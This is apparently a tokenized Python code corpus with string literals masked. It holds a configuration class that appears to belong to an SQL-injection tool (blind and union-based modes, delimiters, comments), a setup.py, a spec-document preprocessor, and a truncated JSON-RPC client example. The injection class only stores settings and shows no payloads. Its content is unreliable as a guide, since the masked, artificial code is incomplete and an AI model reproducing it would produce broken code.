<EOL> def enable_string_encoding ( self , enabled ) : <EOL> """<STR_LIT>""" <EOL> self . __encode_str = enabled <EOL> def enable_truncate ( self , enabled ) : <EOL> """<STR_LIT>""" <EOL> self . __truncate = enabled <EOL> def require_truncate ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __truncate <EOL> def require_string_encoding ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __encode_str <EOL> def enable_ssl ( self , enabled ) : <EOL> """<STR_LIT>""" <EOL> self . __use_ssl = enabled <EOL> def use_ssl ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __use_ssl <EOL> def set_smooth ( self , enabled = True ) : <EOL> """<STR_LIT>""" <EOL> self . __smooth = enabled <EOL> def is_smooth ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __smooth <EOL> def set_multithread ( self , enabled = True ) : <EOL> """<STR_LIT>""" <EOL> self . __multithread = enabled <EOL> def is_multithread ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __multithread <EOL> def has_headers ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __headers is not None <EOL> def set_headers ( self , headers ) : <EOL> """<STR_LIT>""" <EOL> self . __headers = headers <EOL> def set_header ( self , header , value ) : <EOL> """<STR_LIT>""" <EOL> if self . __headers is not None : <EOL> self . __headers [ header ] = value <EOL> else : <EOL> self . __headers = { header : value } <EOL> def get_headers ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __headers <EOL> def set_cookie ( self , cookie ) : <EOL> """<STR_LIT>""" <EOL> self . __cookie = cookie <EOL> def get_cookie ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __cookie <EOL> def set_params ( self , params , target = None ) : <EOL> """<STR_LIT>""" <EOL> self . __params = params <EOL> self . __target = target <EOL> def get_params ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __params <EOL> def get_target_param ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __target <EOL> def get_comment ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __comment <EOL> def set_comment ( self , comment ) : <EOL> """<STR_LIT>""" <EOL> self . __comment = comment <EOL> def get_string_delimiter ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __str_delim <EOL> def set_string_delimiter ( self , delim ) : <EOL> """<STR_LIT>""" <EOL> self . __str_delim = delim <EOL> def set_default_value ( self , default ) : <EOL> """<STR_LIT>""" <EOL> self . __default = default <EOL> def get_default_value ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __default <EOL> def set_inband_fields ( self , fields ) : <EOL> """<STR_LIT>""" <EOL> self . __union_fields = fields <EOL> def get_inband_fields ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __union_fields <EOL> def get_inband_tag ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __union_tag <EOL> def set_inband_target ( self , target ) : <EOL> """<STR_LIT>""" <EOL> self . __union_target = int ( target ) <EOL> def get_inband_target ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __union_target <EOL> def is_blind ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( self . __method == Context . BLIND ) <EOL> def is_inband ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( self . __method == Context . INBAND ) <EOL> def in_string ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( self . __field_type == Context . FIELD_STR ) <EOL> def in_int ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( self . __field_type == Context . FIELD_INT ) <EOL> def use_blind ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __method = Context . BLIND <EOL> def use_inband ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __method = Context . INBAND <EOL> class InbandContext ( Context ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = Context . INBAND <EOL> Context . __init__ ( self , ** kwargs ) <EOL> class BlindContext ( Context ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = Context . BLIND <EOL> Context . __init__ ( self , ** kwargs ) </s>
<s> from setuptools import setup , find_packages <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> keywords = '<STR_LIT>' , <EOL> packages = find_packages ( exclude = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> install_requires = [ '<STR_LIT>' ] <EOL> ) </s>
<s> from __future__ import division , unicode_literals <EOL> import re <EOL> import json <EOL> import copy <EOL> from collections import OrderedDict , defaultdict <EOL> import config <EOL> import biblio <EOL> from . messages import * <EOL> from . htmlhelpers import * <EOL> def transformDataBlocks ( doc , lines ) : <EOL> inBlock = False <EOL> blockTypes = { <EOL> '<STR_LIT>' : transformPropdef , <EOL> '<STR_LIT>' : transformDescdef , <EOL> '<STR_LIT>' : transformElementdef , <EOL> '<STR_LIT>' : transformArgumentdef , <EOL> '<STR_LIT>' : transformRailroad , <EOL> '<STR_LIT>' : transformBiblio , <EOL> '<STR_LIT>' : transformAnchors , <EOL> '<STR_LIT>' : transformLinkDefaults , <EOL> '<STR_LIT>' : transformIgnoredSpecs , <EOL> '<STR_LIT:info>' : transformInfo , <EOL> '<STR_LIT>' : transformInclude , <EOL> '<STR_LIT>' : transformPre <EOL> } <EOL> blockType = "<STR_LIT>" <EOL> tagName = "<STR_LIT>" <EOL> startLine = <NUM_LIT:0> <EOL> newLines = [ ] <EOL> for ( i , line ) in enumerate ( lines ) : <EOL> match = re . match ( r"<STR_LIT>" , line , re . I ) <EOL> if match and not inBlock : <EOL> inBlock = True <EOL> startLine = i <EOL> tagName = match . group ( <NUM_LIT:1> ) <EOL> typeMatch = re . search ( "<STR_LIT:|>" . join ( blockTypes . keys ( ) ) , match . group ( <NUM_LIT:2> ) ) <EOL> if typeMatch : <EOL> blockType = typeMatch . group ( <NUM_LIT:0> ) <EOL> else : <EOL> blockType = "<STR_LIT>" <EOL> match = re . match ( r"<STR_LIT>" + tagName + "<STR_LIT>" , line , re . I ) <EOL> if match and inBlock : <EOL> inBlock = False <EOL> if startLine == i : <EOL> match = re . match ( r"<STR_LIT>" . format ( tagName ) , line , re . I ) <EOL> repl = blockTypes [ blockType ] ( <EOL> lines = [ match . group ( <NUM_LIT:2> ) ] , <EOL> tagName = tagName , <EOL> firstLine = match . group ( <NUM_LIT:1> ) , <EOL> doc = doc ) <EOL> newLines . extend ( repl ) <EOL> newLines . append ( "<STR_LIT>" . format ( - len ( repl ) - <NUM_LIT:1> ) ) <EOL> newLines . append ( match . group ( <NUM_LIT:3> ) ) <EOL> elif re . match ( r"<STR_LIT>" , match . group ( <NUM_LIT:1> ) ) : <EOL> repl = blockTypes [ blockType ] ( <EOL> lines = lines [ startLine + <NUM_LIT:1> : i ] , <EOL> tagName = tagName , <EOL> firstLine = lines [ startLine ] , <EOL> doc = doc ) <EOL> newLines . extend ( repl ) <EOL> newLines . append ( "<STR_LIT>" . format ( ( i - startLine ) - len ( repl ) - <NUM_LIT:1> ) ) <EOL> newLines . append ( match . group ( <NUM_LIT:2> ) ) <EOL> else : <EOL> repl = blockTypes [ blockType ] ( <EOL> lines = lines [ startLine + <NUM_LIT:1> : i ] + [ match . group ( <NUM_LIT:1> ) ] , <EOL> tagName = tagName , <EOL> firstLine = lines [ startLine ] , <EOL> doc = doc ) <EOL> newLines . extend ( repl ) <EOL> newLines . append ( "<STR_LIT>" . format ( ( i - startLine ) - len ( repl ) - <NUM_LIT:1> ) ) <EOL> newLines . append ( match . group ( <NUM_LIT:2> ) ) <EOL> tagName = "<STR_LIT>" <EOL> blockType = "<STR_LIT>" <EOL> continue <EOL> if inBlock : <EOL> continue <EOL> newLines . append ( line ) <EOL> return newLines <EOL> def transformPre ( lines , tagName , firstLine , ** kwargs ) : <EOL> if len ( lines ) == <NUM_LIT:0> : <EOL> return [ firstLine , "<STR_LIT>" . format ( tagName ) ] <EOL> if re . match ( r"<STR_LIT>" , lines [ - <NUM_LIT:1> ] ) : <EOL> lastLine = "<STR_LIT>" . format ( tagName ) <EOL> lines = lines [ : - <NUM_LIT:1> ] <EOL> else : <EOL> lastLine = "<STR_LIT>" . format ( tagName ) <EOL> if len ( lines ) == <NUM_LIT:0> : <EOL> return [ firstLine , lastLine ] <EOL> indent = float ( "<STR_LIT>" ) <EOL> for ( i , line ) in enumerate ( lines ) : <EOL> if line . strip ( ) == "<STR_LIT>" : <EOL> continue <EOL> lines [ i ] = lines [ i ] . replace ( "<STR_LIT:\t>" , "<STR_LIT:U+0020>" ) <EOL> indent = min ( indent , len ( re . match ( r"<STR_LIT>" , lines [ i ] ) . group ( <NUM_LIT:0> ) ) ) <EOL> if indent == float ( "<STR_LIT>" ) : <EOL> indent = <NUM_LIT:0> <EOL> for ( i , line ) in enumerate ( lines ) : <EOL> if line . strip ( ) == "<STR_LIT>" : <EOL> continue <EOL> lines [ i ] = lines [ i ] [ indent : ] <EOL> lines [ <NUM_LIT:0> ] = firstLine . rstrip ( ) + lines [ <NUM_LIT:0> ] <EOL> lines . append ( lastLine ) <EOL> return lines <EOL> def transformPropdef ( lines , doc , firstLine , ** kwargs ) : <EOL> attrs = OrderedDict ( ) <EOL> parsedAttrs = parseDefBlock ( lines , "<STR_LIT>" ) <EOL> forHint = "<STR_LIT>" <EOL> if "<STR_LIT:Name>" in parsedAttrs : <EOL> forHint = "<STR_LIT>" . format ( parsedAttrs [ "<STR_LIT:Name>" ] . split ( "<STR_LIT:U+002C>" ) [ <NUM_LIT:0> ] . strip ( ) ) <EOL> if "<STR_LIT>" in firstLine or "<STR_LIT>" in parsedAttrs : <EOL> attrs [ "<STR_LIT:Name>" ] = None <EOL> attrs [ "<STR_LIT>" ] = None <EOL> ret = [ "<STR_LIT>" . format ( forHint = forHint ) ] <EOL> elif "<STR_LIT>" in firstLine : <EOL> attrs [ "<STR_LIT:Name>" ] = None <EOL> attrs [ "<STR_LIT>" ] = None <EOL> for defaultKey in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> attrs [ defaultKey ] = "<STR_LIT>" <EOL> ret = [ "<STR_LIT>" . format ( forHint = forHint ) ] <EOL> else : <EOL> attrs [ "<STR_LIT:Name>" ] = None <EOL> attrs [ "<STR_LIT>" ] = None <EOL> attrs [ "<STR_LIT>" ] = None <EOL> attrs [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> attrs [ "<STR_LIT>" ] = None <EOL> attrs [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> attrs [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> attrs [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> attrs [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> ret = [ "<STR_LIT>" . format ( forHint = forHint ) ] <EOL> for key , val in attrs . items ( ) : <EOL> if key in parsedAttrs or val is not None : <EOL> if key in parsedAttrs : <EOL> val = parsedAttrs [ key ] <EOL> if key in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> ret . append ( "<STR_LIT>" . format ( key , val ) ) <EOL> elif key == "<STR_LIT>" and val . lower ( ) == "<STR_LIT>" : <EOL> ret . append ( "<STR_LIT>" ) <EOL> else : <EOL> ret . append ( "<STR_LIT>" . format ( key , val ) ) <EOL> else : <EOL> die ( "<STR_LIT>" , parsedAttrs . get ( "<STR_LIT:Name>" , "<STR_LIT>" ) , key ) <EOL> continue <EOL> for key , val in parsedAttrs . items ( ) : <EOL> if key in attrs : <EOL> continue <EOL> ret . append ( "<STR_LIT>" . format ( key , val ) ) <EOL> ret . append ( "<STR_LIT>" ) <EOL> return ret <EOL> def transformDescdef ( lines , doc , firstLine , ** kwargs ) : <EOL> vals = parseDefBlock ( lines , "<STR_LIT>" ) <EOL> if "<STR_LIT>" in firstLine or "<STR_LIT>" in vals : <EOL> requiredKeys = [ "<STR_LIT:Name>" , "<STR_LIT>" ] <EOL> ret = [ "<STR_LIT>" . format ( vals . get ( "<STR_LIT>" , "<STR_LIT>" ) ) ] <EOL> if "<STR_LIT>" in firstLine : <EOL> requiredKeys = [ "<STR_LIT:Name>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> ret = [ "<STR_LIT>" . format ( vals . get ( "<STR_LIT>" , "<STR_LIT>" ) ) ] <EOL> else : <EOL> requiredKeys = [ "<STR_LIT:Name>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> ret = [ "<STR_LIT>" . format ( vals . get ( "<STR_LIT>" , "<STR_LIT>" ) ) ] <EOL> for key in requiredKeys : <EOL> if key == "<STR_LIT>" : <EOL> ret . append ( "<STR_LIT>" . format ( key , vals . get ( key , '<STR_LIT>' ) ) ) <EOL> elif key == "<STR_LIT>" : <EOL> ret . append ( "<STR_LIT>" . format ( key , vals . get ( key , '<STR_LIT>' ) ) ) <EOL> elif key in vals : <EOL> ret . append ( "<STR_LIT>" . format ( key , vals . get ( key , '<STR_LIT>' ) ) ) <EOL> else : <EOL> die ( "<STR_LIT>" , vals . get ( "<STR_LIT:Name>" , "<STR_LIT>" ) , key ) <EOL> continue <EOL> for key in vals . viewkeys ( ) - requiredKeys : <EOL> ret . append ( "<STR_LIT>" . format ( key , vals [ key ] ) ) <EOL> ret . append ( "<STR_LIT>" ) <EOL> return ret <EOL> def transformElementdef ( lines , doc , ** kwargs ) : <EOL> attrs = OrderedDict ( ) <EOL> parsedAttrs = parseDefBlock ( lines , "<STR_LIT>" ) <EOL> if "<STR_LIT>" in parsedAttrs or "<STR_LIT>" in parsedAttrs : <EOL> html = "<STR_LIT>" <EOL> if "<STR_LIT>" in parsedAttrs : <EOL> groups = [ x . strip ( ) for x in parsedAttrs [ "<STR_LIT>" ] . split ( "<STR_LIT:U+002C>" ) ] <EOL> for group in groups : <EOL> html += "<STR_LIT>" . format ( group ) <EOL> del parsedAttrs [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in parsedAttrs : <EOL> atts = [ x . strip ( ) for x in parsedAttrs [ "<STR_LIT>" ] . split ( "<STR_LIT:U+002C>" ) ] <EOL> for att in atts : <EOL> html += "<STR_LIT>" . format ( att , parsedAttrs . get ( "<STR_LIT:Name>" , "<STR_LIT>" ) ) <EOL> html += "<STR_LIT>" <EOL> parsedAttrs [ "<STR_LIT>" ] = html <EOL> attrs [ "<STR_LIT:Name>" ] = None <EOL> attrs [ "<STR_LIT>" ] = None <EOL> attrs [ "<STR_LIT>" ] = None <EOL> attrs [ "<STR_LIT>" ] = None <EOL> attrs [ "<STR_LIT>" ] = None <EOL> attrs [ "<STR_LIT>" ] = None <EOL> ret = [ "<STR_LIT>" ] <EOL> for key , val in attrs . items ( ) : <EOL> if key in parsedAttrs or val is not None : <EOL> if key in parsedAttrs : <EOL> val = parsedAttrs [ key ] <EOL> if key == "<STR_LIT:Name>" : <EOL> ret . append ( "<STR_LIT>" ) <EOL> ret . append ( '<STR_LIT:U+002CU+0020>' . join ( "<STR_LIT>" . format ( x . strip ( ) ) for x in val . split ( "<STR_LIT:U+002C>" ) ) ) <EOL> elif key == "<STR_LIT>" : <EOL> ret . append ( "<STR_LIT>" . format ( key ) ) <EOL> ret . extend ( val . split ( "<STR_LIT:\n>" ) ) <EOL> elif key == "<STR_LIT>" : <EOL> ret . append ( "<STR_LIT>" ) <EOL> ret . append ( '<STR_LIT:U+002CU+0020>' . join ( "<STR_LIT>" . format ( x . strip ( ) ) for x in val . split ( "<STR_LIT:U+002C>" ) ) ) <EOL> elif key == "<STR_LIT>" : <EOL> ret . append ( "<STR_LIT>" ) <EOL> ret . append ( '<STR_LIT:U+002CU+0020>' . join ( "<STR_LIT>" . format ( x . strip ( ) ) for x in val . split ( "<STR_LIT:U+002C>" ) ) ) <EOL> else : <EOL> ret . append ( "<STR_LIT>" . format ( key , val ) ) <EOL> else : <EOL> die ( "<STR_LIT>" , parsedAttrs . get ( "<STR_LIT:Name>" , "<STR_LIT>" ) , key ) <EOL> continue <EOL> for key , val in parsedAttrs . items ( ) : <EOL> if key in attrs : <EOL> continue <EOL> ret . append ( "<STR_LIT>" . format ( key , val ) ) <EOL> ret . append ( "<STR_LIT>" ) <EOL> return ret <EOL> def transformArgumentdef ( lines , firstLine , ** kwargs ) : <EOL> attrs = parseDefBlock ( lines , "<STR_LIT>" , capitalizeKeys = False ) <EOL> el = parseHTML ( firstLine + "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> if "<STR_LIT>" in el . attrib : <EOL> forValue = el . get ( '<STR_LIT>' ) <EOL> el . set ( "<STR_LIT>" , forValue ) <EOL> if "<STR_LIT:/>" in forValue : <EOL> interface , method = forValue . split ( "<STR_LIT:/>" ) <EOL> else : <EOL> die ( "<STR_LIT>" , forValue ) <EOL> return <EOL> removeAttr ( el , "<STR_LIT>" ) <EOL> else : <EOL> die ( "<STR_LIT>" ) <EOL> return <EOL> addClass ( el , "<STR_LIT:data>" ) <EOL> rootAttrs = "<STR_LIT:U+0020>" . join ( "<STR_LIT>" . format ( k , escapeAttr ( v ) ) for k , v in el . attrib . items ( ) ) <EOL> lines = [ <EOL> '''<STR_LIT>''' . format ( attrs = rootAttrs , interface = interface , method = method ) <EOL> ] + [ <EOL> '''<STR_LIT>''' . format ( param , desc ) <EOL> for param , desc in attrs . items ( ) <EOL> ] + [ <EOL> '''<STR_LIT>''' <EOL> ] <EOL> return lines <EOL> def parseDefBlock ( lines , type , capitalizeKeys = True ) : <EOL> vals = OrderedDict ( ) <EOL> lastKey = None <EOL> for line in lines : <EOL> match = re . match ( r"<STR_LIT>" , line ) <EOL> if match is None : <EOL> if lastKey is not None and ( line . strip ( ) == "<STR_LIT>" or re . match ( r"<STR_LIT>" , line ) ) : <EOL> key = lastKey <EOL> val = line . strip ( ) <EOL> else : <EOL> die ( "<STR_LIT>" , vals . get ( "<STR_LIT:Name>" , "<STR_LIT>" ) , line , type ) <EOL> continue <EOL> else : <EOL> key = match . group ( <NUM_LIT:1> ) . strip ( ) <EOL> if capitalizeKeys : <EOL> key = key . capitalize ( ) <EOL> lastKey = key <EOL> val = match . group ( <NUM_LIT:2> ) . strip ( ) <EOL> if key in vals : <EOL> vals [ key ] += "<STR_LIT:\n>" + val <EOL> else : <EOL> vals [ key ] = val <EOL> return vals <EOL> def transformRailroad ( lines , doc , ** kwargs ) : <EOL> import StringIO <EOL> import railroadparser <EOL> ret = [ "<STR_LIT>" ] <EOL> doc . extraStyles [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> code = '<STR_LIT>' . join ( lines ) <EOL> diagram = railroadparser . parse ( code ) <EOL> temp = StringIO . StringIO ( ) <EOL> diagram . writeSvg ( temp . write ) <EOL> ret . append ( temp . getvalue ( ) ) <EOL> temp . close ( ) <EOL> ret . append ( "<STR_LIT>" ) <EOL> return ret <EOL> def transformBiblio ( lines , doc , ** kwargs ) : <EOL> storage = defaultdict ( list ) <EOL> biblio . processSpecrefBiblioFile ( '<STR_LIT>' . join ( lines ) , storage , order = <NUM_LIT:1> ) <EOL> for k , vs in storage . items ( ) : <EOL> doc . refs . biblioKeys . add ( k ) <EOL> doc . refs . biblios [ k ] . extend ( vs ) <EOL> return [ ] <EOL> def transformAnchors ( lines , doc , ** kwargs ) : <EOL> anchors = parseInfoTree ( lines , doc . md . indent ) <EOL> return processAnchors ( anchors , doc ) <EOL> def processAnchors ( anchors , doc ) : <EOL> for anchor in anchors : <EOL> if "<STR_LIT:type>" not in anchor or len ( anchor [ '<STR_LIT:type>' ] ) != <NUM_LIT:1> : <EOL> die ( "<STR_LIT>" , config . printjson ( anchor ) ) <EOL> continue <EOL> if "<STR_LIT:text>" not in anchor or len ( anchor [ '<STR_LIT:text>' ] ) != <NUM_LIT:1> : <EOL> die ( "<STR_LIT>" , config . printjson ( anchor ) ) <EOL> continue <EOL> if "<STR_LIT:url>" not in anchor and "<STR_LIT>" not in anchor : <EOL> die ( "<STR_LIT>" , config . printjson ( anchor ) ) <EOL> continue <EOL> if "<STR_LIT>" in anchor : <EOL> urlPrefix = '<STR_LIT>' . join ( anchor [ '<STR_LIT>' ] ) <EOL> else : <EOL> urlPrefix = "<STR_LIT>" <EOL> if "<STR_LIT:url>" in anchor : <EOL> urlSuffix = anchor [ '<STR_LIT:url>' ] [ <NUM_LIT:0> ] <EOL> else : <EOL> urlSuffix = config . simplifyText ( anchor [ '<STR_LIT:text>' ] [ <NUM_LIT:0> ] ) <EOL> url = urlPrefix + ( "<STR_LIT>" if "<STR_LIT:#>" in urlPrefix or "<STR_LIT:#>" in urlSuffix else "<STR_LIT:#>" ) + urlSuffix <EOL> if anchor [ '<STR_LIT:type>' ] [ <NUM_LIT:0> ] in config . lowercaseTypes : <EOL> anchor [ '<STR_LIT:text>' ] [ <NUM_LIT:0> ] = anchor [ '<STR_LIT:text>' ] [ <NUM_LIT:0> ] . lower ( ) <EOL> doc . refs . refs [ anchor [ '<STR_LIT:text>' ] [ <NUM_LIT:0> ] ] . append ( { <EOL> "<STR_LIT>" : anchor [ '<STR_LIT:text>' ] [ <NUM_LIT:0> ] , <EOL> "<STR_LIT:type>" : anchor [ '<STR_LIT:type>' ] [ <NUM_LIT:0> ] , <EOL> "<STR_LIT:url>" : url , <EOL> "<STR_LIT>" : doc . md . shortname , <EOL> "<STR_LIT>" : doc . md . level , <EOL> "<STR_LIT>" : anchor . get ( '<STR_LIT>' , [ ] ) , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT:status>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : anchor . get ( '<STR_LIT>' , [ '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> } ) <EOL> methodishStart = re . match ( r"<STR_LIT>" , anchor [ '<STR_LIT:text>' ] [ <NUM_LIT:0> ] ) <EOL> if methodishStart : <EOL> arglessName = methodishStart . group ( <NUM_LIT:1> ) + "<STR_LIT:)>" <EOL> doc . refs . addMethodVariants ( anchor [ '<STR_LIT:text>' ] [ <NUM_LIT:0> ] , anchor . get ( '<STR_LIT>' , [ ] ) , doc . md . shortname ) <EOL> return [ ] <EOL> def transformLinkDefaults ( lines , doc , ** kwargs ) : <EOL> lds = parseInfoTree ( lines , doc . md . indent ) <EOL> return processLinkDefaults ( lds , doc ) <EOL> def processLinkDefaults ( lds , doc ) : <EOL> for ld in lds : <EOL> if len ( ld . get ( '<STR_LIT:type>' , [ ] ) ) != <NUM_LIT:1> : <EOL> die ( "<STR_LIT>" , config . printjson ( ld ) ) <EOL> continue <EOL> else : <EOL> type = ld [ '<STR_LIT:type>' ] [ <NUM_LIT:0> ] <EOL> if len ( ld . get ( '<STR_LIT>' , [ ] ) ) != <NUM_LIT:1> : <EOL> die ( "<STR_LIT>" , config . printjson ( ld ) ) <EOL> continue <EOL> else : <EOL> spec = ld [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> if len ( ld . get ( '<STR_LIT:text>' , [ ] ) ) != <NUM_LIT:1> : <EOL> die ( "<STR_LIT>" , config . printjson ( ld ) ) <EOL> continue <EOL> else : <EOL> text = ld [ '<STR_LIT:text>' ] [ <NUM_LIT:0> ] <EOL> if '<STR_LIT>' in ld : <EOL> for _for in ld [ '<STR_LIT>' ] : <EOL> doc . md . linkDefaults [ text ] . append ( ( spec , type , ld . get ( '<STR_LIT:status>' , None ) , _for ) ) <EOL> else : <EOL> doc . md . linkDefaults [ text ] . append ( ( spec , type , ld . get ( '<STR_LIT:status>' , None ) , None ) ) <EOL> return [ ] <EOL> def transformIgnoredSpecs ( lines , doc , ** kwargs ) : <EOL> specs = parseInfoTree ( lines , doc . md . indent ) <EOL> return processIgnoredSpecs ( specs , doc ) <EOL> def processIgnoredSpecs ( specs , doc ) : <EOL> for spec in specs : <EOL> if len ( spec . get ( '<STR_LIT>' , [ ] ) ) == <NUM_LIT:0> : <EOL> die ( "<STR_LIT>" , config . printjson ( spec ) ) <EOL> continue <EOL> specNames = spec . get ( '<STR_LIT>' ) <EOL> if len ( spec . get ( '<STR_LIT>' , [ ] ) ) > <NUM_LIT:1> : <EOL> die ( "<STR_LIT>" , config . printjson ( spec ) ) <EOL> continue <EOL> replacedBy = spec . get ( '<STR_LIT>' ) [ <NUM_LIT:0> ] if '<STR_LIT>' in spec else None <EOL> for specName in specNames : <EOL> if replacedBy : <EOL> doc . refs . replacedSpecs . add ( ( specName , replacedBy ) ) <EOL> else : <EOL> doc . refs . ignoredSpecs . add ( specName ) <EOL> return [ ] <EOL> def transformInfo ( lines , doc , ** kwargs ) : <EOL> infos = parseInfoTree ( lines , doc . md . indent ) <EOL> return processInfo ( infos , doc ) <EOL> def processInfo ( infos , doc ) : <EOL> knownInfoTypes = { <EOL> "<STR_LIT>" : processAnchors , <EOL> "<STR_LIT>" : processLinkDefaults , <EOL> "<STR_LIT>" : processIgnoredSpecs <EOL> } <EOL> infoCollections = defaultdict ( list ) <EOL> for info in infos : <EOL> if len ( info . get ( '<STR_LIT:info>' , [ ] ) ) != <NUM_LIT:1> : <EOL> die ( "<STR_LIT>" , config . printjson ( info ) ) <EOL> continue <EOL> infoType = info . get ( '<STR_LIT:info>' ) [ <NUM_LIT:0> ] . lower ( ) <EOL> if infoType not in knownInfoTypes : <EOL> die ( "<STR_LIT>" , infoType ) <EOL> continue <EOL> infoCollections [ infoType ] . append ( info ) <EOL> for infoType , infos in infoCollections . items ( ) : <EOL> knownInfoTypes [ infoType ] ( infos , doc ) <EOL> return [ ] <EOL> def transformInclude ( lines , doc , ** kwargs ) : <EOL> infos = parseInfoTree ( lines , doc . md . indent ) <EOL> path = None <EOL> macros = { } <EOL> for info in infos : <EOL> if "<STR_LIT:path>" in info : <EOL> if path is None : <EOL> path = info [ '<STR_LIT:path>' ] [ <NUM_LIT:0> ] <EOL> else : <EOL> die ( "<STR_LIT>" ) <EOL> if "<STR_LIT>" in info : <EOL> for k , v in info . items ( ) : <EOL> if k == "<STR_LIT>" : <EOL> continue <EOL> if k not in macros and len ( v ) == <NUM_LIT:1> : <EOL> macros [ k ] = v [ <NUM_LIT:0> ] <EOL> else : <EOL> die ( "<STR_LIT>" , k ) <EOL> el = "<STR_LIT>" . format ( escapeAttr ( path ) ) <EOL> for i , ( k , v ) in enumerate ( macros . items ( ) ) : <EOL> el += "<STR_LIT>" . format ( i , k , escapeAttr ( v ) ) <EOL> el += "<STR_LIT>" <EOL> return [ el ] <EOL> def parseInfoTree ( lines , indent = <NUM_LIT:4> ) : <EOL> def extendData ( datas , infoLevels ) : <EOL> if not infoLevels : <EOL> return <EOL> newData = defaultdict ( list ) <EOL> for infos in infoLevels : <EOL> for k , v in infos . items ( ) : <EOL> newData [ k ] . extend ( v ) <EOL> datas . append ( newData ) <EOL> datas = [ ] <EOL> infoLevels = [ ] <EOL> lastIndent = - <NUM_LIT:1> <EOL> indentSpace = "<STR_LIT:U+0020>" * indent <EOL> for line in lines : <EOL> if line . strip ( ) == "<STR_LIT>" : <EOL> continue <EOL> ws , text = re . match ( "<STR_LIT>" , line ) . groups ( ) <EOL> wsLen = len ( ws . replace ( "<STR_LIT:\t>" , indentSpace ) ) <EOL> if wsLen % indent != <NUM_LIT:0> : <EOL> die ( "<STR_LIT>" , text , indent ) <EOL> return [ ] <EOL> wsLen = wsLen // indent <EOL> if wsLen >= lastIndent + <NUM_LIT:2> : <EOL> die ( "<STR_LIT>" , text , wsLen - lastIndent ) <EOL> return [ ] <EOL> if wsLen <= lastIndent : <EOL> extendData ( datas , infoLevels [ : lastIndent + <NUM_LIT:1> ] ) <EOL> info = defaultdict ( list ) <EOL> for piece in text . split ( "<STR_LIT:;>" ) : <EOL> if piece . strip ( ) == "<STR_LIT>" : <EOL> continue <EOL> match = re . match ( "<STR_LIT>" , piece ) <EOL> if not match : <EOL> die ( "<STR_LIT>" , line ) <EOL> return [ ] <EOL> key = match . group ( <NUM_LIT:1> ) . strip ( ) <EOL> val = match . group ( <NUM_LIT:2> ) . strip ( ) <EOL> info [ key ] . append ( val ) <EOL> if wsLen < len ( infoLevels ) : <EOL> infoLevels [ wsLen ] = info <EOL> else : <EOL> infoLevels . append ( info ) <EOL> lastIndent = wsLen <EOL> extendData ( datas , infoLevels [ : lastIndent + <NUM_LIT:1> ] ) <EOL> return datas </s>
<s> import os <EOL> import sys <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT:..>' ) ) <EOL> from twisted . internet import reactor <EOL> from twisted . internet import defer <EOL> from twisted . cred . credentials import UsernamePassword <EOL> from fastjsonrpc . client import Proxy <EOL> def printValue ( value ) : <EOL> print "<STR_LIT>" % str ( value ) <EOL> def printError ( error ) : <EOL> print '<STR_LIT:error>' , error . value <EOL> def shutDown ( data ) : <EOL> print "<STR_LIT>" <EOL> reactor . stop ( ) <EOL> address = '<STR_LIT>' <EOL> credentials = UsernamePassword ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> proxy = Proxy ( address , credentials = credentials ) <EOL> ds = [ ] <EOL> d = proxy . callRemote ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> d . addCallbacks ( printValue , printError ) <EOL> ds . append ( d ) <EOL> d = proxy . callRemote ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT:15> ) <EOL> d . addCallbacks ( printValue , printError ) <EOL> ds . append ( d ) <EOL> d = proxy 